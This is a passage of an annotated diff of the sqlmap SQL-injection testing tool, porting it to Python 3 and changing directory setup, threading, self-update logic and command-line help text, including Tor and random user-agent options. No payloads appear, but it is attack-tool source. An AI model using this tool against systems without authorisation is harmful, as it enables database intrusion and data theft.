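The _resumeDBMS() change above makes a missing DBMS fingerprint fatal only when running offline, since without requests there is nothing left to detect. A hedged sketch of that control flow with invented names:

    class NoUsableDataError(Exception):
        pass

    def resume_dbms(stored_value, offline):
        # No stored fingerprint: fatal in offline mode, otherwise detection simply runs later
        if not stored_value:
            if offline:
                raise NoUsableDataError("unable to continue in offline mode because of lack of usable session data")
            return None
        return stored_value.lower()

    print(resume_dbms("MySQL", offline=False))  # mysql
    print(resume_dbms(None, offline=False))     # None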
@@ -546,7 +558,7 @@ def _setResultsFile():
 conf.resultsFilename = os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower())
 try:
 conf.resultsFP = openFile(conf.resultsFilename, "a", UNICODE_ENCODING, buffering=0)
-except (OSError, IOError), ex:
+except (OSError, IOError) as ex:
 try:
 warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFilename, getUnicode(ex))
 handle, conf.resultsFilename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.RESULTS, suffix=".csv")

@@ -554,7 +566,7 @@ def _setResultsFile():
 conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
 warnMsg += "Using temporary file '%s' instead" % conf.resultsFilename
 logger.warn(warnMsg)
-except IOError, _:
+except IOError as _:
 errMsg = "unable to write to the temporary directory ('%s'). " % _
 errMsg += "Please make sure that your disk is not full and "
 errMsg += "that you have sufficient write permissions to "

@@ -570,15 +582,15 @@ def _createFilesDir():
 Create the file directory.
 """

-if not conf.rFile:
+if not conf.fileRead:
 return

 conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname

 if not os.path.isdir(conf.filePath):
 try:
-os.makedirs(conf.filePath, 0755)
+os.makedirs(conf.filePath)
-except OSError, ex:
+except OSError as ex:
 tempDir = tempfile.mkdtemp(prefix="sqlmapfiles")
 warnMsg = "unable to create files directory "
 warnMsg += "'%s' (%s). " % (conf.filePath, getUnicode(ex))

@@ -599,8 +611,8 @@ def _createDumpDir():

 if not os.path.isdir(conf.dumpPath):
 try:
-os.makedirs(conf.dumpPath, 0755)
+os.makedirs(conf.dumpPath)
-except OSError, ex:
+except OSError as ex:
 tempDir = tempfile.mkdtemp(prefix="sqlmapdump")
 warnMsg = "unable to create dump directory "
 warnMsg += "'%s' (%s). " % (conf.dumpPath, getUnicode(ex))

@@ -618,43 +630,45 @@ def _createTargetDirs():
 Create the output directory.
 """

-try:
-if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH):
-os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
-
-_ = os.path.join(paths.SQLMAP_OUTPUT_PATH, randomStr())
-open(_, "w+b").close()
-os.remove(_)
-
-if conf.outputDir:
-warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH
-logger.warn(warnMsg)
-except (OSError, IOError), ex:
-try:
-tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
-except Exception, _:
-errMsg = "unable to write to the temporary directory ('%s'). " % _
-errMsg += "Please make sure that your disk is not full and "
-errMsg += "that you have sufficient write permissions to "
-errMsg += "create temporary files and/or directories"
-raise SqlmapSystemException(errMsg)
-
-warnMsg = "unable to %s output directory " % ("create" if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH) else "write to the")
-warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex))
-warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
-logger.warn(warnMsg)
-
-paths.SQLMAP_OUTPUT_PATH = tempDir
+for context in "output", "history":
+directory = paths["SQLMAP_%s_PATH" % context.upper()]
+
+try:
+if not os.path.isdir(directory):
+os.makedirs(directory)
+
+_ = os.path.join(directory, randomStr())
+open(_, "w+b").close()
+os.remove(_)
+
+if conf.outputDir and context == "output":
+warnMsg = "using '%s' as the %s directory" % (directory, context)
+logger.warn(warnMsg)
+except (OSError, IOError) as ex:
+try:
+tempDir = tempfile.mkdtemp(prefix="sqlmap%s" % context)
+except Exception as _:
+errMsg = "unable to write to the temporary directory ('%s'). " % _
+errMsg += "Please make sure that your disk is not full and "
+errMsg += "that you have sufficient write permissions to "
+errMsg += "create temporary files and/or directories"
+raise SqlmapSystemException(errMsg)
+
+warnMsg = "unable to %s %s directory " % ("create" if not os.path.isdir(directory) else "write to the", context)
+warnMsg += "'%s' (%s). " % (directory, getUnicode(ex))
+warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
+logger.warn(warnMsg)
+
+paths["SQLMAP_%s_PATH" % context.upper()] = tempDir

 conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))

 try:
 if not os.path.isdir(conf.outputPath):
-os.makedirs(conf.outputPath, 0755)
+os.makedirs(conf.outputPath)
-except (OSError, IOError, TypeError), ex:
+except (OSError, IOError, TypeError) as ex:
 try:
 tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
-except Exception, _:
+except Exception as _:
 errMsg = "unable to write to the temporary directory ('%s'). " % _
 errMsg += "Please make sure that your disk is not full and "
 errMsg += "that you have sufficient write permissions to "
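The rewritten _createTargetDirs() above applies one routine to both the output and the history directories: create the directory if needed, probe that it is writable, and fall back to a per-context temporary directory otherwise. A condensed hedged sketch (invented default paths, Python 3, simplified error handling):

    import os
    import random
    import string
    import tempfile

    paths = {
        "SQLMAP_OUTPUT_PATH": os.path.expanduser("~/.sqlmap/output"),    # assumed defaults
        "SQLMAP_HISTORY_PATH": os.path.expanduser("~/.sqlmap/history"),
    }

    def ensure_writable_dirs():
        for context in ("output", "history"):
            key = "SQLMAP_%s_PATH" % context.upper()
            directory = paths[key]
            try:
                os.makedirs(directory, exist_ok=True)
                # Probe writability with a throwaway file
                probe = os.path.join(directory, "".join(random.sample(string.ascii_lowercase, 8)))
                open(probe, "w+b").close()
                os.remove(probe)
            except (OSError, IOError):
                # Preferred directory is unusable: fall back to a temporary one
                paths[key] = tempfile.mkdtemp(prefix="sqlmap%s" % context)

    ensure_writable_dirs()
    print(paths)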
@@ -668,14 +682,16 @@ def _createTargetDirs():

 conf.outputPath = tempDir

+conf.outputPath = getUnicode(conf.outputPath)

 try:
-with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f:
+with openFile(os.path.join(conf.outputPath, "target.txt"), "w+") as f:
 f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
 f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
 f.write(" # %s" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding))
 if conf.data:
 f.write("\n\n%s" % getUnicode(conf.data))
-except IOError, ex:
+except IOError as ex:
 if "denied" in getUnicode(ex):
 errMsg = "you don't have enough permissions "
 else:

@@ -688,6 +704,13 @@ def _createTargetDirs():
 _createFilesDir()
 _configureDumper()

+def _setAuxOptions():
+"""
+Setup auxiliary (host-dependent) options
+"""

+kb.aliasName = randomStr(seed=hash(conf.hostname or ""))

 def _restoreMergedOptions():
 """
 Restore merged options (command line, configuration file and default values)
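_setAuxOptions() above derives a random-looking alias by seeding the generator with a hash of the hostname, so every call during a run produces the same alias for the same target. A hedged sketch of the idea (plain random module, not sqlmap's randomStr() helper; note that hash() of a string changes between interpreter sessions in Python 3):

    import random
    import string

    def host_alias(hostname, length=8):
        # Seed the PRNG with the hostname so repeated calls in one run agree
        rng = random.Random(hash(hostname or ""))
        return "".join(rng.choice(string.ascii_lowercase) for _ in range(length))

    print(host_alias("www.example.com"))
    print(host_alias("www.example.com") == host_alias("www.example.com"))  # True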
@@ -734,6 +757,9 @@ def initTargetEnv():
 setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original)
 kb.postSpaceToPlus = '+' in original

+match = re.search(INJECT_HERE_REGEX, conf.data or "") or re.search(INJECT_HERE_REGEX, conf.url or "")
+kb.customInjectionMark = match.group(0) if match else CUSTOM_INJECTION_MARK_CHAR

 def setupTargetEnv():
 _createTargetDirs()
 _setRequestParams()

@@ -741,3 +767,4 @@ def setupTargetEnv():
 _resumeHashDBValues()
 _setResultsFile()
 _setAuthCred()
+_setAuxOptions()
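The initTargetEnv() addition above lets an explicit marker inside the POST data or the URL override the default custom injection mark. A hedged sketch with assumed values for the regex and the fallback character (sqlmap defines the real ones in its settings module):

    import re

    INJECT_HERE_REGEX = r"(?i)%INJECT[_ ]?HERE%"  # assumed pattern
    CUSTOM_INJECTION_MARK_CHAR = "*"

    def detect_injection_mark(data, url):
        # Prefer a user-supplied marker in the data or URL, otherwise fall back to '*'
        match = re.search(INJECT_HERE_REGEX, data or "") or re.search(INJECT_HERE_REGEX, url or "")
        return match.group(0) if match else CUSTOM_INJECTION_MARK_CHAR

    print(detect_injection_mark("id=1&comment=%INJECT HERE%", None))   # %INJECT HERE%
    print(detect_injection_mark("id=1", "http://www.site.com/?id=1"))  # *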
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -17,6 +17,7 @@ import traceback

 from extra.beep.beep import beep
 from lib.controller.controller import start
+from lib.core.common import checkIntegrity
 from lib.core.common import clearConsoleLine
 from lib.core.common import dataToStdout
 from lib.core.common import getUnicode

@@ -51,6 +52,9 @@ def smokeTest():
 retVal = True
 count, length = 0, 0

+if not checkIntegrity():
+retVal = False
+
 for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH):
 if any(_ in root for _ in ("thirdparty", "extra")):
 continue

@@ -71,10 +75,10 @@ def smokeTest():
 try:
 __import__(path)
 module = sys.modules[path]
-except Exception, msg:
+except Exception as ex:
 retVal = False
 dataToStdout("\r")
-errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), msg)
+errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), ex)
 logger.error(errMsg)
 else:
 # Run doc tests
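The smoke test above walks the source tree and tries to import every module, marking the run as failed if any import raises. A hedged, stripped-down sketch of the same loop for a generic package root (no doctests, no progress output):

    import os
    import sys

    def import_smoke_test(root_path):
        ok = True
        for root, _, files in os.walk(root_path):
            if any(part in root for part in ("thirdparty", "extra")):
                continue  # skip bundled third-party code
            for filename in files:
                if not filename.endswith(".py") or filename == "__init__.py":
                    continue
                # Turn e.g. lib/core/common.py into lib.core.common
                path = os.path.splitext(os.path.join(root, filename))[0]
                path = os.path.relpath(path, root_path).replace(os.sep, ".")
                try:
                    __import__(path)
                except Exception as ex:
                    ok = False
                    print("failed to import module '%s' (%s)" % (path, ex))
        return ok

    if __name__ == "__main__":
        sys.path.insert(0, ".")
        print("smoke test %s" % ("passed" if import_smoke_test(".") else "failed"))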
@@ -271,10 +275,10 @@ def runCase(parse):
 result = start()
 except KeyboardInterrupt:
 pass
-except SqlmapBaseException, e:
+except SqlmapBaseException as ex:
-handled_exception = e
+handled_exception = ex
-except Exception, e:
+except Exception as ex:
-unhandled_exception = e
+unhandled_exception = ex
 finally:
 sys.stdout.seek(0)
 console = sys.stdout.read()
@@ -1,10 +1,12 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

+from __future__ import print_function

 import difflib
 import random
 import threading

@@ -91,10 +93,13 @@ def exceptionHandledFunction(threadFunction, silent=False):
 kb.threadContinue = False
 kb.threadException = True
 raise
-except Exception, ex:
+except Exception as ex:
-if not silent:
+if not silent and kb.get("threadContinue"):
 logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))

+if conf.get("verbose") > 1:
+traceback.print_exc()

 def setDaemon(thread):
 # Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation
 if PYVERSION >= "2.6":
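The threading change above stops worker threads from logging errors once a shutdown has already been requested, and prints a traceback only at higher verbosity. A hedged standalone sketch using plain globals in place of sqlmap's kb/conf objects:

    import threading
    import traceback

    thread_continue = True   # stands in for kb.threadContinue
    verbose = 2              # stands in for conf.verbose

    def exception_handled(thread_function, silent=False):
        try:
            return thread_function()
        except KeyboardInterrupt:
            raise
        except Exception as ex:
            # Only report while the thread pool is still supposed to be running
            if not silent and thread_continue:
                print("thread %s: %s" % (threading.current_thread().name, ex))
                if verbose > 1:
                    traceback.print_exc()

    def worker():
        raise ValueError("boom")

    exception_handled(worker)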
@@ -105,7 +110,6 @@ def setDaemon(thread):
 def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardException=True, threadChoice=False, startThreadMsg=True):
 threads = []

-kb.multiThreadMode = True
 kb.threadContinue = True
 kb.threadException = False

@@ -147,7 +151,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio

 try:
 thread.start()
-except Exception, ex:
+except Exception as ex:
 errMsg = "error occurred while starting new thread ('%s')" % ex.message
 logger.critical(errMsg)
 break

@@ -163,8 +167,9 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
 alive = True
 time.sleep(0.1)

-except (KeyboardInterrupt, SqlmapUserQuitException), ex:
+except (KeyboardInterrupt, SqlmapUserQuitException) as ex:
-print
+print()
+kb.prependFlag = False
 kb.threadContinue = False
 kb.threadException = True

@@ -180,22 +185,24 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
 if forwardException:
 raise

-except (SqlmapConnectionException, SqlmapValueException), ex:
+except (SqlmapConnectionException, SqlmapValueException) as ex:
-print
+print()
 kb.threadException = True
 logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))

+if conf.get("verbose") > 1:
+traceback.print_exc()

 except:
 from lib.core.common import unhandledExceptionMessage

-print
+print()
 kb.threadException = True
 errMsg = unhandledExceptionMessage()
 logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg))
 traceback.print_exc()

 finally:
-kb.multiThreadMode = False
 kb.bruteMode = False
 kb.threadContinue = True
 kb.threadException = False
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -1,25 +1,34 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-import locale
+import glob
 import os
 import re
+import shutil
 import subprocess
+import sys
 import time
+import urllib
+import zipfile

 from lib.core.common import dataToStdout
 from lib.core.common import getSafeExString
+from lib.core.common import getLatestRevision
 from lib.core.common import pollProcess
+from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.revision import getRevisionNumber
 from lib.core.settings import GIT_REPOSITORY
 from lib.core.settings import IS_WIN
+from lib.core.settings import VERSION
+from lib.core.settings import ZIPBALL_PAGE
+from lib.core.settings import UNICODE_ENCODING

 def update():
 if not conf.updateAll:

@@ -28,25 +37,80 @@ def update():
 success = False

 if not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")):
-errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
+warnMsg = "not a git repository. It is recommended to clone the 'sqlmapproject/sqlmap' repository "
-errMsg += "from GitHub (e.g. 'git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap')"
+warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY
-logger.error(errMsg)
+logger.warn(warnMsg)

+if VERSION == getLatestRevision():
+logger.info("already at the latest revision '%s'" % getRevisionNumber())
+return

+message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]"
+if readInput(message, default='N', boolean=True):
+directory = os.path.abspath(paths.SQLMAP_ROOT_PATH)

+try:
+open(os.path.join(directory, "sqlmap.py"), "w+b")
+except Exception as ex:
+errMsg = "unable to update content of directory '%s' ('%s')" % (directory, getSafeExString(ex))
+logger.error(errMsg)
+else:
+attrs = os.stat(os.path.join(directory, "sqlmap.py")).st_mode
+for wildcard in ('*', ".*"):
+for _ in glob.glob(os.path.join(directory, wildcard)):
+try:
+if os.path.isdir(_):
+shutil.rmtree(_)
+else:
+os.remove(_)
+except:
+pass

+if glob.glob(os.path.join(directory, '*')):
+errMsg = "unable to clear the content of directory '%s'" % directory
+logger.error(errMsg)
+else:
+try:
+archive = urllib.urlretrieve(ZIPBALL_PAGE)[0]

+with zipfile.ZipFile(archive) as f:
+for info in f.infolist():
+info.filename = re.sub(r"\Asqlmap[^/]+", "", info.filename)
+if info.filename:
+f.extract(info, directory)

+filepath = os.path.join(paths.SQLMAP_ROOT_PATH, "lib", "core", "settings.py")
+if os.path.isfile(filepath):
+with open(filepath, "rb") as f:
+version = re.search(r"(?m)^VERSION\s*=\s*['\"]([^'\"]+)", f.read()).group(1)
+logger.info("updated to the latest version '%s#dev'" % version)
+success = True
+except Exception as ex:
+logger.error("update could not be completed ('%s')" % getSafeExString(ex))
+else:
+if not success:
+logger.error("update could not be completed")
+else:
+try:
+os.chmod(os.path.join(directory, "sqlmap.py"), attrs)
+except OSError:
+logger.warning("could not set the file attributes of '%s'" % os.path.join(directory, "sqlmap.py"))
 else:
-infoMsg = "updating sqlmap to the latest development version from the "
+infoMsg = "updating sqlmap to the latest development revision from the "
 infoMsg += "GitHub repository"
 logger.info(infoMsg)

 debugMsg = "sqlmap will try to update itself using 'git' command"
 logger.debug(debugMsg)

-dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
+dataToStdout("\r[%s] [INFO] update in progress" % time.strftime("%X"))

 try:
-process = subprocess.Popen("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=paths.SQLMAP_ROOT_PATH.encode(locale.getpreferredencoding())) # Reference: http://blog.stastnarodina.com/honza-en/spot/python-unicodeencodeerror/
+process = subprocess.Popen("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=paths.SQLMAP_ROOT_PATH.encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
 pollProcess(process, True)
 stdout, stderr = process.communicate()
 success = not process.returncode
-except (IOError, OSError), ex:
+except (IOError, OSError) as ex:
 success = False
 stderr = getSafeExString(ex)

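When the installation is not a git working copy, the new code above offers to fetch the repository 'zipball', clear the installation directory and unpack the archive while stripping its top-level folder. A much simplified hedged sketch (Python 3 urllib, assumed zipball URL, no cleanup or permission handling):

    import os
    import re
    import tempfile
    import urllib.request
    import zipfile

    ZIPBALL_PAGE = "https://github.com/sqlmapproject/sqlmap/zipball/master"  # assumed URL

    def update_from_zipball(directory):
        # Download the zipball to a temporary file and extract it in place
        archive, _ = urllib.request.urlretrieve(ZIPBALL_PAGE)
        with zipfile.ZipFile(archive) as f:
            for info in f.infolist():
                # Strip the leading "sqlmap...-<sha>/" folder so files land directly in 'directory'
                info.filename = re.sub(r"\Asqlmap[^/]+", "", info.filename)
                if info.filename:
                    f.extract(info, directory)

    if __name__ == "__main__":
        target = tempfile.mkdtemp(prefix="sqlmapupdate")
        update_from_zipball(target)
        print(os.listdir(target))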
@@ -55,7 +119,7 @@ def update():
 else:
 if "Not a git repository" in stderr:
 errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
-errMsg += "from GitHub (e.g. 'git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap')"
+errMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY
 logger.error(errMsg)
 else:
 logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip())

@@ -68,7 +132,7 @@ def update():
 infoMsg += "download the latest snapshot from "
 infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads"
 else:
-infoMsg = "for Linux platform it's required "
+infoMsg = "for Linux platform it's recommended "
 infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')"

 logger.info(infoMsg)
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -43,11 +43,11 @@ class Wordlist(object):
 if os.path.splitext(self.current)[1].lower() == ".zip":
 try:
 _ = zipfile.ZipFile(self.current, 'r')
-except zipfile.error, ex:
+except zipfile.error as ex:
 errMsg = "something appears to be wrong with "
 errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex))
 errMsg += "sure that you haven't made any changes to it"
-raise SqlmapInstallationException, errMsg
+raise SqlmapInstallationException(errMsg)
 if len(_.namelist()) == 0:
 errMsg = "no file(s) inside '%s'" % self.current
 raise SqlmapDataException(errMsg)

@@ -68,15 +68,15 @@ class Wordlist(object):
 while True:
 self.counter += 1
 try:
-retVal = self.iter.next().rstrip()
+retVal = next(self.iter).rstrip()
-except zipfile.error, ex:
+except zipfile.error as ex:
 errMsg = "something appears to be wrong with "
 errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex))
 errMsg += "sure that you haven't made any changes to it"
-raise SqlmapInstallationException, errMsg
+raise SqlmapInstallationException(errMsg)
 except StopIteration:
 self.adjust()
-retVal = self.iter.next().rstrip()
+retVal = next(self.iter).rstrip()
 if not self.proc_count or self.counter % self.proc_count == self.proc_id:
 break
 return retVal
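Several hunks above replace Python 2-only spellings (except E, e: / raise E, msg / iterator.next()) with forms that also work on Python 3. A small hedged illustration of the iterator part (assumed file name in the usage comment):

    def first_nonempty_line(path):
        with open(path) as f:
            iterator = iter(f)
            while True:
                try:
                    # next(iterator) works on Python 2 and 3; iterator.next() is Python 2 only
                    line = next(iterator).rstrip()
                except StopIteration:
                    return None
                if line:
                    return line

    # Usage (assumed file name):
    # print(first_nonempty_line("wordlist.txt"))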
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -1,10 +1,12 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
from __future__ import print_function
|
||||||
|
|
||||||
import os
|
import os
|
||||||
import re
|
import re
|
||||||
import shlex
|
import shlex
|
||||||
@@ -50,9 +52,7 @@ def cmdLineParser(argv=None):
|
|||||||
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
|
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
|
||||||
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding)
|
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding)
|
||||||
|
|
||||||
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
|
usage = "%s%s [options]" % ("python " if not IS_WIN else "", "\"%s\"" % _ if " " in _ else _)
|
||||||
"\"%s\"" % _ if " " in _ else _)
|
|
||||||
|
|
||||||
parser = OptionParser(usage=usage)
|
parser = OptionParser(usage=usage)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
@@ -101,29 +101,27 @@ def cmdLineParser(argv=None):
|
|||||||
help="Force usage of given HTTP method (e.g. PUT)")
|
help="Force usage of given HTTP method (e.g. PUT)")
|
||||||
|
|
||||||
request.add_option("--data", dest="data",
|
request.add_option("--data", dest="data",
|
||||||
help="Data string to be sent through POST")
|
help="Data string to be sent through POST (e.g. \"id=1\")")
|
||||||
|
|
||||||
request.add_option("--param-del", dest="paramDel",
|
request.add_option("--param-del", dest="paramDel",
|
||||||
help="Character used for splitting parameter values")
|
help="Character used for splitting parameter values (e.g. &)")
|
||||||
|
|
||||||
request.add_option("--cookie", dest="cookie",
|
request.add_option("--cookie", dest="cookie",
|
||||||
help="HTTP Cookie header value")
|
help="HTTP Cookie header value (e.g. \"PHPSESSID=a8d127e..\")")
|
||||||
|
|
||||||
request.add_option("--cookie-del", dest="cookieDel",
|
request.add_option("--cookie-del", dest="cookieDel",
|
||||||
help="Character used for splitting cookie values")
|
help="Character used for splitting cookie values (e.g. ;)")
|
||||||
|
|
||||||
request.add_option("--load-cookies", dest="loadCookies",
|
request.add_option("--load-cookies", dest="loadCookies",
|
||||||
help="File containing cookies in Netscape/wget format")
|
help="File containing cookies in Netscape/wget format")
|
||||||
|
|
||||||
request.add_option("--drop-set-cookie", dest="dropSetCookie",
|
request.add_option("--drop-set-cookie", dest="dropSetCookie", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Ignore Set-Cookie header from response")
|
help="Ignore Set-Cookie header from response")
|
||||||
|
|
||||||
request.add_option("--user-agent", dest="agent",
|
request.add_option("--user-agent", dest="agent",
|
||||||
help="HTTP User-Agent header value")
|
help="HTTP User-Agent header value")
|
||||||
|
|
||||||
request.add_option("--random-agent", dest="randomAgent",
|
request.add_option("--random-agent", dest="randomAgent", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Use randomly selected HTTP User-Agent header value")
|
help="Use randomly selected HTTP User-Agent header value")
|
||||||
|
|
||||||
request.add_option("--host", dest="host",
|
request.add_option("--host", dest="host",
|
||||||
@@ -139,62 +137,55 @@ def cmdLineParser(argv=None):
|
|||||||
help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
|
help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
|
||||||
|
|
||||||
request.add_option("--auth-type", dest="authType",
|
request.add_option("--auth-type", dest="authType",
|
||||||
help="HTTP authentication type "
|
help="HTTP authentication type (Basic, Digest, NTLM or PKI)")
|
||||||
"(Basic, Digest, NTLM or PKI)")
|
|
||||||
|
|
||||||
request.add_option("--auth-cred", dest="authCred",
|
request.add_option("--auth-cred", dest="authCred",
|
||||||
help="HTTP authentication credentials "
|
help="HTTP authentication credentials (name:password)")
|
||||||
"(name:password)")
|
|
||||||
|
|
||||||
request.add_option("--auth-file", dest="authFile",
|
request.add_option("--auth-file", dest="authFile",
|
||||||
help="HTTP authentication PEM cert/private key file")
|
help="HTTP authentication PEM cert/private key file")
|
||||||
|
|
||||||
request.add_option("--ignore-code", dest="ignoreCode", type="int",
|
request.add_option("--ignore-code", dest="ignoreCode", type="int",
|
||||||
help="Ignore HTTP error code (e.g. 401)")
|
help="Ignore (problematic) HTTP error code (e.g. 401)")
|
||||||
|
|
||||||
request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
|
request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
|
||||||
help="Ignore system default proxy settings")
|
help="Ignore system default proxy settings")
|
||||||
|
|
||||||
request.add_option("--ignore-redirects", dest="ignoreRedirects", action="store_true",
|
request.add_option("--ignore-redirects", dest="ignoreRedirects", action="store_true",
|
||||||
help="Ignore redirection attempts")
|
help="Ignore redirection attempts")
|
||||||
|
|
||||||
request.add_option("--ignore-timeouts", dest="ignoreTimeouts", action="store_true",
|
request.add_option("--ignore-timeouts", dest="ignoreTimeouts", action="store_true",
|
||||||
help="Ignore connection timeouts")
|
help="Ignore connection timeouts")
|
||||||
|
|
||||||
request.add_option("--proxy", dest="proxy",
|
request.add_option("--proxy", dest="proxy",
|
||||||
help="Use a proxy to connect to the target URL")
|
help="Use a proxy to connect to the target URL")
|
||||||
|
|
||||||
request.add_option("--proxy-cred", dest="proxyCred",
|
request.add_option("--proxy-cred", dest="proxyCred",
|
||||||
help="Proxy authentication credentials "
|
help="Proxy authentication credentials (name:password)")
|
||||||
"(name:password)")
|
|
||||||
|
|
||||||
request.add_option("--proxy-file", dest="proxyFile",
|
request.add_option("--proxy-file", dest="proxyFile",
|
||||||
help="Load proxy list from a file")
|
help="Load proxy list from a file")
|
||||||
|
|
||||||
request.add_option("--tor", dest="tor",
|
request.add_option("--tor", dest="tor", action="store_true",
|
||||||
action="store_true",
|
help="Use Tor anonymity network")
|
||||||
help="Use Tor anonymity network")
|
|
||||||
|
|
||||||
request.add_option("--tor-port", dest="torPort",
|
request.add_option("--tor-port", dest="torPort",
|
||||||
help="Set Tor proxy port other than default")
|
help="Set Tor proxy port other than default")
|
||||||
|
|
||||||
request.add_option("--tor-type", dest="torType",
|
request.add_option("--tor-type", dest="torType",
|
||||||
help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))")
|
help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))")
|
||||||
|
|
||||||
request.add_option("--check-tor", dest="checkTor",
|
request.add_option("--check-tor", dest="checkTor", action="store_true",
|
||||||
action="store_true",
|
help="Check to see if Tor is used properly")
|
||||||
help="Check to see if Tor is used properly")
|
|
||||||
|
|
||||||
request.add_option("--delay", dest="delay", type="float",
|
request.add_option("--delay", dest="delay", type="float",
|
||||||
help="Delay in seconds between each HTTP request")
|
help="Delay in seconds between each HTTP request")
|
